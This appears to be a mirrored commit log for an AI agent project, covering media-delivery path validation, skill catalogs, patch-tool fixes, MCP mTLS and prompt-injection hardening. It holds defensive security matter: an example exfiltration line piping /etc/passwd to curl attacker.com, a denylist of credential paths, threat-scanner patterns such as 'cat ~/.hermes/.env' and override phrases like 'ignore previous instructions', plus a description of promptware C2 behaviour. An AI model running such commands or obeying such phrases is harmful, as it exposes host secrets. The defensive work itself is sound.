hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-05-30 06:41:51 +00:00

Author	SHA1	Message	Date
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	7050c052e3	fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025 ) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build.	2026-05-28 11:28:12 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	78be458608	fix(patch): widen new_string \t/\r unescape to all match strategies (#33733 ) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the matched region of the file: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733	2026-05-28 03:27:20 -07:00
liuhao1024	e9f3f2b34a	fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733	2026-05-28 03:27:20 -07:00
Dusk1e	a91b1c8b31	fix(tirith): reject non-regular tar members during auto-install process	2026-05-28 02:49:26 -07:00
Teknium	fb9f3a4ef9	fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748 ) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000	2026-05-28 01:42:19 -07:00
Teknium	87e5b2fae0	feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721 ) Adds first-class `client_cert` / `client_key` config keys so MCP servers behind mTLS work without an external TLS-terminating proxy. Resolves inbound community question (Jeremy W.). Schema (per `mcp_servers.<name>`, HTTP/SSE only): - `client_cert: "/path/to/combined.pem"` — single PEM with cert + key - `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate - `client_cert: [cert, key]` or `[cert, key, password]` — list form, with optional passphrase for encrypted keys Paths support `~` expansion. Missing files raise a server-scoped `FileNotFoundError` at connect time rather than failing later with an opaque TLS handshake error. Wiring: - New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned `httpx.AsyncClient` alongside the existing `verify=` handling. - SSE path: routed through an `httpx_client_factory` that wraps the SDK's defaults (follow_redirects=True) and layers `verify` + `cert` on top. The factory is only injected when needed, so the SDK's built-in `create_mcp_http_client` keeps being used in the default case. - Deprecated mcp<1.24 path left untouched — that SDK's `streamablehttp_client` signature doesn't expose `cert`, and adding it would be dead code. Also documents the previously-undocumented `ssl_verify` key (bool or CA bundle path) in the MCP config reference. Tests: - `tests/tools/test_mcp_client_cert.py` (new, 19 tests): - `_resolve_client_cert` helper: all three input forms, `~` expansion, missing-file and validation errors. - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for string and tuple forms; absent when unset; missing-file error propagates. - SSE transport: factory only injected when cert or non-default verify is set; factory applies cert, custom CA bundle, and preserves `follow_redirects=True` + forwarded headers/auth. - Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py` still pass.	2026-05-28 00:55:55 -07:00
Robin Fernandes	dc52b82d53	test(auth): update entitlement CI expectations	2026-05-28 00:19:31 -07:00
Robin Fernandes	1cf5e639b3	fix(auth): refresh Nous entitlement in tool menus	2026-05-28 00:19:31 -07:00
Robin Fernandes	406901b27d	feat(auth) normalise the way in which we check whether a user has free/paid access to nous portal so we can expose behaviour and error messages accordingly.	2026-05-28 00:19:31 -07:00
Teknium	4e702fe2d9	test(ci): harden two flaky tests against CI noise (#33675 ) Some checks are pending Deploy Site / deploy-vercel (push) Waiting to run Details Deploy Site / deploy-docs (push) Waiting to run Details Docker / shell lint / Lint Dockerfile (hadolint) (push) Waiting to run Details Docker / shell lint / Lint docker/ shell scripts (shellcheck) (push) Waiting to run Details Docker Build and Publish / build-amd64 (push) Waiting to run Details Docker Build and Publish / build-arm64 (push) Waiting to run Details Docker Build and Publish / merge (push) Blocked by required conditions Details Lint (ruff + ty) / ruff + ty diff (push) Waiting to run Details Lint (ruff + ty) / ruff enforcement (blocking) (push) Waiting to run Details Lint (ruff + ty) / Windows footguns (blocking) (push) Waiting to run Details Nix / nix (macos-latest) (push) Waiting to run Details Nix / nix (ubuntu-latest) (push) Waiting to run Details OSV-Scanner / Scan lockfiles (push) Waiting to run Details Tests / test (1) (push) Waiting to run Details Tests / test (2) (push) Waiting to run Details Tests / test (3) (push) Waiting to run Details Tests / test (4) (push) Waiting to run Details Tests / test (5) (push) Waiting to run Details Tests / test (6) (push) Waiting to run Details Tests / save-durations (push) Blocked by required conditions Details Tests / e2e (push) Waiting to run Details uv.lock check / uv lock --check (push) Waiting to run Details Two unrelated transient failures on PR #33661's initial CI run, both pre-existing on main and recovered on rerun. Hardening: 1. tests/cron/test_scheduler.py::TestRunJobConfigLogging — added mocks for resolve_runtime_provider() and discover_mcp_tools(). The yaml-warning tests intend to exercise only the warning-log path, but _run_job_impl continues into provider resolution and MCP discovery after the warning. Both can spawn subprocesses / hit the network and pushed the test over its 30s budget under GHA load. 2. tests/tools/test_browser_supervisor.py — wrapped Chrome teardown against the stdlib subprocess._wait() race (bpo-38630). When SIGCHLD arrives during proc.wait(), _try_wait(WNOHANG) can return a foreign pid and the 'assert pid == self.pid or pid == 0' fires. Fixture now catches AssertionError/TimeoutExpired, force-kills, and always reaps so no zombie escapes. Same hardening applied to the early-skip branch.	2026-05-27 23:15:41 -07:00
teknium1	36c99af37a	test(kanban): align two tests with recent kanban hardening Two pre-existing test failures on main, both pointing at code that was hardened recently — not behaviour bugs, test expectations that fell out of date. 1. tests/tools/test_kanban_tools.py::test_worker_complete_rejects_stale_run_id `c002668ff` ("fix(kanban): add grace period to detect_crashed_workers") gates each running task behind a launch-window grace period so freshly-spawned workers whose PID isn't yet visible on /proc don't get reclaimed. The test creates a worker_env fixture moments before asserting reclamation, so the default 30s grace skips the liveness check and detect_crashed_workers returns []. Fix: set HERMES_KANBAN_CRASH_GRACE_SECONDS=0 in the test so we get the immediate-reclaim semantics the assertion expects. 2. tests/tools/test_windows_native_support.py:: TestKanbanWaitpidWindowsGuard::test_source_gates_waitpid_loop `ffdc937c1` ("fix(kanban): hoist zombie reaper out of dispatch_once") reshaped reap_worker_zombies to use an early-return Windows guard (\`if os.name == "nt": return []\`) instead of an inverted gate (\`if os.name != "nt":\`). Both correctly keep the waitpid loop off Windows — the early-return form is stronger because the rest of the function never runs. Fix: accept either gate pattern in the source scan. Both failures reproduce verbatim on \`origin/main\` in a clean env; neither relates to in-flight work on #33564 (the FD-leak fix). Filing this as a separate fix-it PR per green-CI-policy so the kanban CI shard stays green for downstream PRs.	2026-05-27 18:26:44 -07:00
wysie	f040710d04	fix: backfill official optional skill provenance	2026-05-27 13:39:58 -07:00
wysie	a38e283395	fix: preserve nested official skill install paths	2026-05-27 13:39:58 -07:00
Teknium	187cf0f257	tools(terminal): nudge homebrewed CI pollers at the tool surface (#33142 ) Background processes whose command contains `gh pr view --json statusCheckRollup` or `gh pr checks \| jq` now get a runtime hint in the result pointing at the canonical green-ci-policy snippets. The homebrew shape has caused at least seven silent CI-watcher failures in the past two weeks (#31329, #31448, #31695, #31709, #31745, #32264, #33131) — each one a different jq/awk/grep variation of the same fundamental problem (stdout buffering, jq null-key edge cases, conclusion-vs-status confusion, TTY-only banner grepping). The skill that documents this anti-pattern is excellent, but a skill only fires if the agent loads it. The tool surface fires on every misuse. This is the embed-footguns-in-tool-surface pattern from PR #31289 applied to a recurring failure mode that's outgrown skill-only enforcement. Detector is deliberately narrow — flags two specific shapes: 1. Any command containing `statusCheckRollup` (the JSON-API path — conclusion vs status field semantics keep burning us). 2. `gh pr view` / `gh pr checks` combined with `jq` (gh pr checks doesn't emit JSON, so any `\| jq` here is confused intent; the canonical column-2 poller uses awk-on-tabs, not jq). Does NOT flag the blessed column-2 awk-on-tabs poller (which uses `awk -F"\t" "\==\"pending\""`) or the exit-code-driven `gh pr checks $PR >/dev/null` snippet. Hint composes with the existing background-without-notify_on_complete hint — both can fire on the same call. Each is independently actionable. Tests: - 4 new cases in tests/tools/test_notify_on_complete.py - test_homebrew_ci_poller_via_statusCheckRollup_emits_hint (positive) - test_homebrew_ci_poller_via_gh_pr_checks_piped_to_jq_emits_hint (positive) - test_canonical_column2_awk_poller_does_not_emit_homebrew_hint (negative) - test_canonical_gh_pr_checks_exit_code_loop_does_not_emit_hint (negative) - test_non_ci_background_command_does_not_emit_homebrew_hint (negative) - 30/30 passing (was 26)	2026-05-27 02:22:08 -07:00
Teknium	febc4cfec0	remove Vercel AI Gateway and Vercel Sandbox (#33067 ) * remove Vercel AI Gateway provider and Vercel Sandbox terminal backend Both Vercel-hosted integrations are removed end-to-end. Users on the AI Gateway should switch to OpenRouter or one of the other aggregators (Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should switch to Docker, Modal, Daytona, or SSH. What's removed: - `plugins/model-providers/ai-gateway/` provider plugin - `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper - `tools/environments/vercel_sandbox.py` terminal backend - `ai-gateway` provider wiring across auth, doctor, setup, models, config, status, providers, main, web_server, model_normalize, dump - `vercel_sandbox` backend wiring across terminal_tool, file_tools, code_execution_tool, file_operations, approval, skills_tool, environments/local, credential_files, lazy_deps, prompt_builder, cli, gateway/run - `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client header set, run_agent base-URL header/reasoning special-cases - `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock - env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`, `VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`, `TERMINAL_VERCEL_RUNTIME` - Tests: deletes test_ai_gateway_models.py and test_vercel_sandbox_environment.py; scrubs references across 23 surviving test files (no entire tests deleted unless they were dedicated to AI Gateway / Sandbox) - Docs: provider tables, env-var reference, setup guides, security notes, tool config, terminal-backend tables — English plus zh-Hans i18n parity - `hermes-agent` skill: provider table entry and remote-backend list What stays (intentional): - `popular-web-designs/templates/vercel.md` — CSS design reference, unrelated to Vercel-the-AI-product - `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN response header, useful diag signal on any Vercel-hosted endpoint - `vercel-labs/agent-browser` URL in browser config — lightpanda browser project, different OSS effort - `userStories.json` historical contributor entry mentioning Vercel Sandbox — archive, not active docs Validation: - 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`) - Full repo `py_compile` clean - Live import of every touched module + invariant check (no `ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no `vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`) * test: convert profile-count check from change-detector to invariant The hardcoded "== 34" assertion broke when ai-gateway was removed. Per AGENTS.md change-detector-test guidance, assert the relationship (registry count >= number of plugin dirs) instead of a literal count. Counts shift when providers are added/removed; that's expected.	2026-05-27 00:43:32 -07:00
Ben Barclay	81a4f280d2	Merge pull request #22534 from wesleysimplicio/fix/voice-mode-docker-respect-pulse-pipewire fix(voice): honor PULSE_SERVER/PIPEWIRE_REMOTE inside Docker (#21203)	2026-05-27 13:59:12 +10:00
MorAlekss	c26af46811	fix(skills): reject symlinks in skill bundles before install	2026-05-25 18:33:02 -07:00
Teknium	ccd899318e	fix(cron): split scanner into two tiers so skill prose stops false-positiving (#32339 ) The runtime cron prompt scanner (added in #3968 to plug the "malicious skill carrying an injection payload" gap) reuses the same critical-severity patterns as the create-time user-prompt scan against the assembled prompt — which includes loaded skill markdown. That works fine for narrow patterns like "ignore previous instructions" which never legitimately appear in prose. It catastrophically false- positives on command-shape patterns like `cat ~/.hermes/.env`, `authorized_keys`, `/etc/sudoers`, and `rm -rf /`, which routinely appear in security postmortems and runbooks as descriptive prose about attacks, not as actual commands. Concrete failure: the bundled `hermes-agent-dev` skill contains a security postmortem section saying "the attacker could just `cat ~/.hermes/.env`". Every PR-scout cron job that loaded this skill was silently blocked with `Blocked: prompt matches threat pattern 'read_secrets'`. All 11 scout jobs failed for weeks. Fix: split the scanner into two tiers and route by context: - `_scan_cron_prompt` (strict, unchanged behavior) runs against the small user-authored cron prompt at create/update and as a runtime defense-in-depth when no skills are attached. A legit user prompt has no business saying `cat .env`, so the strict patterns still apply there. - `_scan_cron_skill_assembled` (new, looser) runs against the assembled prompt when skills are attached. It only catches unambiguous prompt-injection directives ("ignore previous instructions", "disregard your rules", "system prompt override", "do not tell the user") plus invisible-unicode markers. Command- shape patterns are dropped because they false-positive on prose. This is defense-in-depth, not the only line of defense. Skill bodies are already scanned at install time by `skills_guard.py`; the runtime cron scan exists purely as a tripwire for an obvious injection directive surviving a malicious install. Catching prose mentions of commands was never the goal of #3968 — the test that planted a skill containing `cat ~/.hermes/.env` was the wrong shape of test for the threat model. Tests: - `_scan_cron_prompt` strict behavior preserved (56 existing tests unchanged: bare `cat .env`, `rm -rf /`, etc. still block). - New `TestScanCronSkillAssembled` class verifies the looser scanner: injection / disregard / system-override / do-not-tell-the-user / invisible-unicode still block; descriptive prose about attack commands is allowed; GitHub auth-header allowlist still works. - `test_skill_with_env_exfil_payload_raises` (planted `cat .env` in skill body) replaced with `test_skill_with_env_exfil_command _in_prose_is_allowed` documenting the new correct behavior with the real-world postmortem-style example that triggered the bug. - All 11 originally-failing PR-scout jobs validated end-to-end via `_build_job_prompt` — assembled prompts now build successfully with the `hermes-agent-dev` skill attached. Total: 75/75 tests in cron + cronjob_tools + threat scanner pass; 544/544 across the wider cron / memory / threat-pattern surface.	2026-05-25 18:20:45 -07:00
Teknium	6bd0be30be	feat(patch): indentation preservation, CRLF preservation, per-file failure escalation (#507 ) (#32273 ) Three granular patch-tool refinements from the Roo Code deep-dive (#507). ## Indentation preservation (fuzzy_match.py) When fuzzy_find_and_replace matches via a non-exact strategy, the file's indentation may differ from what the LLM sent in old_string/new_string (common case: model sends zero-indent old/new for a method body that lives inside an 8-space-indented class). Before this commit the replacement was spliced in verbatim, producing a file with a broken indent level that may still parse but is logically wrong. The fix computes the indent delta between old_string's first meaningful line and the matched region's first meaningful line, then re-indents every line of new_string by that delta. Exact-strategy matches are untouched (passthrough). Same approach as Roo Code's multi-search-replace.ts:466-500. ## CRLF preservation (file_operations.py) Models nearly always send tool args with bare LF endings (JSON-encoded), but the file on disk may have CRLF (Windows-line-ending configs, .bat, .cmd, .ini files). Before this commit: - write_file silently normalized CRLF to LF on every overwrite - patch produced mixed-ending files: the substituted region had LF, the surrounding context kept CRLF The fix detects the file's existing line endings (via pre_content if already read for lint/LSP, otherwise a tiny head -c 4096 probe), and normalizes the entire write to that ending. New files are written verbatim (no detection possible). ## Per-file failure escalation (file_tools.py) When the agent fails to patch the same file 3+ times in a row, the existing 'old_string not found' hint isn't strong enough — the model keeps retrying with variations against a stale view of the file. The fix tracks consecutive failures per (task_id, resolved_path) and injects an escalating hint after 3 failures: 'This is failure #N patching X. Stop retrying. Either re-read fresh, use longer context, or fall back to write_file.' Counter resets on a successful patch to the same path. ## Validation - 22 new tests across tests/tools/test_fuzzy_match.py (5), test_line_ending_preservation.py (12), test_patch_failure_tracking.py (5) - All existing tests pass (165/165 in the touched files) - E2E verified with real _handle_patch / _handle_write_file calls against real CRLF files and real failure loops Closes part of #507. The remaining open items in #507 (2b start_line hint, behavioral rules) were declined after audit: - 2b adds schema bloat for a problem the existing 'multiple matches' contract already handles - Behavioral rules conflict with the personality system Items 1, 2d, 2e, 3, 4 of #507 were already landed in earlier work.	2026-05-25 15:18:45 -07:00
Teknium	0dee92df22	feat(security): promptware defense — shared threat patterns + memory load-time scan + tool-result delimiters (#32269 ) Hardens the context window against Brainworm-class promptware attacks (see #496). Three changes: 1. tools/threat_patterns.py — single source of truth for injection/promptware patterns. Replaces the duplicated pattern lists in prompt_builder.py and memory_tool.py. Adds ~15 new Brainworm/C2 patterns (node registration, heartbeat/beacon, pull tasking, anti-forensic disk avoidance, identity override, known framework names). Three scopes — 'all' (narrow, classic injection), 'context' (adds promptware/role-play, broader detection), 'strict' (adds persistence/SSH-backdoor patterns for user-mediated writes). 2. MemoryStore.load_from_disk() now scans entries at snapshot-build time. Poisoned entries are replaced with [BLOCKED: ...] placeholders in the frozen system-prompt snapshot. Live state keeps the original so the user can still inspect + remove via memory(action=read/remove). Scan is deterministic from disk bytes — prefix-cache invariant holds. 3. make_tool_result_message() wraps results from high-risk tools (web_extract, web_search, browser_, mcp_) in <untrusted_tool_result source="...">...</untrusted_tool_result> delimiters with framing prose telling the model the content is data, not instructions. Architectural defense against indirect injection from poisoned web pages, GitHub issues, MCP responses — does NOT regex-scan tool results (pattern arms race + per-iteration latency). Multimodal content lists pass through unwrapped to preserve adapter compatibility. Pattern philosophy: anchor on C2-specific vocabulary or unambiguous attack behavior, NOT on bossy English. Dropped patterns suggested in #496 that would have tripped legitimate content: standalone 'you are obligated to', 'do not respond immediately', 'you must X' without a C2-verb anchor. Validation: - 257/257 targeted tests pass (test_threat_patterns + test_memory_tool + test_tool_dispatch_helpers + test_prompt_builder) - E2E run with real Brainworm payload: blocked from AGENTS.md context-file path, blocked from MEMORY.md snapshot, wrapped in delimiters when arriving via web_extract. Legitimate 'you must follow conventions' phrasing not flagged. Explicitly NOT in this PR (per #496 discussion): - Per-tool-result regex scanning (pattern arms race) - SessionBehaviorMonitor / polling-loop detection (wrong layer) - Outbound network gating (Docker backend already covers this) - security.context_scanning warn\|block knob (current behavior is always block-with-placeholder — there's no warn mode that makes sense) Closes #496 for Phase 1 + the architectural delimiter piece of Phase 2. Phase 3 stays in tracking issue territory.	2026-05-25 14:52:24 -07:00
Teknium	5caeb65a08	test(tts): regression coverage for #29417 double-[pause] fix Three new tests in tests/tools/test_tts_xai_speech_tags.py: - multi_paragraph_emits_single_pause — the headline #29417 case. Requires a first sentence of 12+ chars to hit the _XAI_FIRST_SENTENCE_RE length floor; the trivial 'Hello.\\n\\nWorld.' case dodged the bug by accident, which is why the PR's quoted repro didn't reproduce. Uses the longer 'Welcome to the demo of our new product line.\\n\\nIt has many features.' shape that actually trips the bug. - single_paragraph_still_gets_first_sentence_pause — sanity guard that the fix only suppresses the first-sentence pass when a paragraph pass injected [pause], so plain single-paragraph input still gets its leading pause. - single_newline_still_gets_first_sentence_pause — single newline isn't a paragraph break, no [pause] from the paragraph pass, so the first-sentence pause MUST still fire. Catches over-broad fixes.	2026-05-25 14:30:06 -07:00
Teknium	0a6a0ba527	test(skills): widen assertion in PR#6656 regression to accept new validator msg The new install-path validator from this PR raises 'Unsafe install path: ...' earlier in the pipeline than the previous resolve-then-check path. Behavior is identical (ok=False, victim untouched, refused before rmtree) — only the error string changed.	2026-05-25 06:13:36 -07:00
峯岸亮	3b9b9a7ad7	fix(skills): guard uninstall lock paths Validate Skills Hub lock-file install paths at both ends of the lifecycle so a poisoned or malformed lock.json entry cannot drive shutil.rmtree to a location outside SKILLS_DIR: - HubLockFile.record_install rejects empty/'.'/absolute/traversal/ Windows-drive paths at write time, and requires the final path component to match the skill name (shape: '<skill>' or '<category>/<skill>'). - install_from_quarantine resolves its destination through the same validator, catching symlink/junction redirects inside skills/. - uninstall_skill resolves the lock entry through the new validator before rmtree. Refuses anything that resolves to SKILLS_DIR itself (empty/dot paths) or to a target outside SKILLS_DIR (absolute paths, traversal, symlinked dirs in skills/ pointing outward). - 14 focused regression tests covering each rejection class plus a symlink-redirect case. E2E verified: hand-crafted poisoned lock.json entries (absolute path, empty install_path, traversal) all refuse and leave the targeted victim untouched; legitimate uninstall still succeeds. Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>	2026-05-25 06:13:36 -07:00
Teknium	46c1ae8b24	fix(tests): four pre-existing flakes from the security cluster merge (#32072 ) All four failures were broken by the security cluster (#10082 / #10133 / #4609 / symlink-reject batch) merging on May 25. They were red on origin/main HEAD when #32042 and #32061 ran, gating PRs that touched unrelated code. 1) tests/hermes_cli/test_update_zip_symlink_reject.py test_update_via_zip_accepts_normal_member called the real _update_via_zip without sandboxing PROJECT_ROOT — so the function's shutil.copytree() actually copied the fake README from the test ZIP over the real repo's README.md, which then made test_readme_mentions_powershell_installer fail in any test run that happened to pick this test up earlier. Mock PROJECT_ROOT to an isolated tmp_path / install_dir, stub subprocess so pip/uv reinstall doesn't actually run, and assert the fake README lands in the sandbox (not the real tree). 2) tests/tools/test_windows_native_support.py test_readme_mentions_powershell_installer was the victim of (1) — nothing wrong with the test itself, the fix in (1) clears it. 3) tests/tools/test_file_read_guards.py test_proc_fd_other_not_blocked called _is_blocked_device('/proc/self/fd/3') expecting False. But _is_blocked_device runs realpath() and on pytest xdist workers fd 3 happens to be dup'd to /dev/urandom (because the worker subprocess inherits open fds from pytest's collection pipe machinery). Switch to the lower-level _is_blocked_device_path which is the path-pattern check the test actually means to exercise; realpath-resolution coverage already lives in test_symlink_to_blocked_device_is_blocked. 4) tests/tools/test_transcription_tools.py Module installed a faster_whisper stub via sys.modules without setting __spec__, then later @pytest.mark.skipif called importlib.util.find_spec('faster_whisper') which raises 'ValueError: __spec__ is None' for modules with a None spec attr. Set __spec__ on the stub to a real ModuleSpec. Validation: 195/195 green across the 4 affected files.	2026-05-25 05:50:29 -07:00
Teknium	8191f663dd	feat(mcp-oauth): accept 'skip' at paste prompt to bypass auth without disabling server (#32069 ) When an MCP server triggers OAuth at startup, the user can now type 'skip' (or 'cancel', 's', 'n', 'no', 'q', 'quit') at the paste prompt + Enter to exit the flow cleanly and continue agent startup without that server. Previously the only ways to bypass an unwanted OAuth prompt were: - Wait the full 5-minute paste timeout - Ctrl+C (also kills the whole reload, may leave half-state) - Edit config.yaml to set 'enabled: false' on the server Skip writes a sentinel to result['error'] which _wait_for_callback maps to OAuthNonInteractiveError('user_skipped'). mcp_tool already classifies that as an auth error in _is_auth_error() and the reconnect loop logs it as 'not retrying automatically' — server stays disconnected for the session, other MCP servers continue normally, no infinite retry burn. The skip message tells users how to re-auth later ('hermes mcp login') or disable persistently ('enabled: false'), so they don't have to remember. 14 new tests covering: case-insensitive skip parsing, all 7 skip tokens, skip not stomping an HTTP-listener win, skip routed to skip path rather than URL-parse path, sentinel mapped to OAuthNonInteractiveError, prompt mentions the skip option.	2026-05-25 05:37:30 -07:00
